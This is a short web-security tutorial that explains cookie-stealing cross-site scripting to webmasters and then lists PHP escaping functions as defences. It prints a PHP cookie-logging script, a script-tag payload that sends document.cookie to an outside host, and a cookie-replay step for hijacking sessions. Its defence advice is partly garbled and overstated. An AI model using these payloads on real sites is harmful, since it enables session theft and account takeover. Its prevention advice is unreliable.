XSS or Cross Site Scripting is the newest trend for hacking and a very popular one. XSS is a very easy method to gain access to a website. Put simply, XSS is injecting a JavaScript forward script into any user input field on a target site. The forward URL will generally be a log script that steals your cookie information (or session ID).

Once the hacker has this information they can take over your account. This is somewhat of a guide and tutorial on XSS with the intention of educating web masters on how attacks occur and the methods to prevent these type of attacks.

Step 1
The hacker will have a script that grabs your information and saves it somewhere (usually a file) that they can retrieve at a later date.

A Sample PHP Log Script:

< ?php
$information=$_GET['info'];
$file=fopen("infolog.txt", "a");
fwrite($file, "$informationn");
fclose($file);
print "Thanks!";
?>

Lets call this script sessionlog.php and pretend the hacker placed it at this URL: http://www.mydomain.com/sessionlog.php


Step 2
Next the hacker will find a target site. The target site must have user input fields and allow the insertion of JavaScript script tags.

A Sample JavaScript Injection Code:

< script >window.location = "http://www.mydomain.com/sessionlog.php?info="+document.cookie < /script>

This code will redirect users to the URL of your choice. In the example above it will redirect the users to our pretend script, http://www.mydomain.com/sessionlog.php with a variable named info which contains the users cookie information.

Step 3 - Your Information
Now that the hacker has your information he/she can then extract the data from the file. They can then return to your site and type the following in the URL.

Javascript:void(document.cookie="variablename=info")

variablename will be replaced with the cookie value name and info will be replaced with the cookie information received from the log script. A simple refresh of the page and they can be a new user (an admin for instance) on the new site.

Protection MethodS - Preventing XSS
I'll note PHP functions here and describe them. For other web scripting languages you can probably find similar functions.

There are three functions in PHP that will prevent XSS.

1. strip_tags() - This function will delete all HTML tags except the ones you allow.

$html_text = strip_tags($html_text);

2. htmlspecialchars() - This function will convert all < and > characters into "<" and ">"

$html_text = htmlspecialchars($html_text);

3. htmlentities() - This function is identical to the above function but converts all characters with entity equivalents.

$html_text = htmlentities($html_text);

Use one of these three methods on all input data. This will prevent an XSS attack from occuring.

 

Need Help?
Ask your security question on our forum in the appropriate section.